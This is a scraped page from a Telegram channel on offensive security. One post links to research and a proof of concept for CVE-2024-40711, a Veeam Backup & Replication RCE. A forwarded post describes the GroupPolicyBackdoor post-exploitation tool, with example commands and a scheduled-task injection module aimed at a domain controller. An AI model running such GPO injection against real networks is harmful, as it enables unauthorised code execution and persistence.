APT
@APT_Notes
12.8K subscribers
550 photos
27 videos
24 files
890 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
Download Telegram
About
Blog
Apps
Platform
Join
APT
12.8K subscribers
APT
🖥 Veeam Backup & Response — RCE (CVE-2024-40711)

A critical deserialization vulnerability in .NET Remoting has been discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution (RCE). The flaw affects versions 12.1.2.172 and earlier.

🔗 Research:
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/

🔗 Source:
https://github.com/watchtowrlabs/CVE-2024-40711

#veeam #backup #deserialization #unauth #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
watchTowr Labs
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
Every sysadmin is familiar with Veeam’s enterprise-oriented backup solution, ‘Veeam Backup & Replication’. Unfortunately, so is every ransomware operator, given it's somewhat 'privileged position' in the storage world of most enterprise's networks. There's…
👍5🔥5😁1
30.9K views
APT
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
💻 GroupPolicyBackdoor

Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на 😰 Python
Впервые представлена на DEFCON 33

Примеры:

#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'


Пример ini:

[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]


GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs


💻 Repo
📔 Docs

#gpo #redteam #windows

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍5🔥4🤔1
5.85K views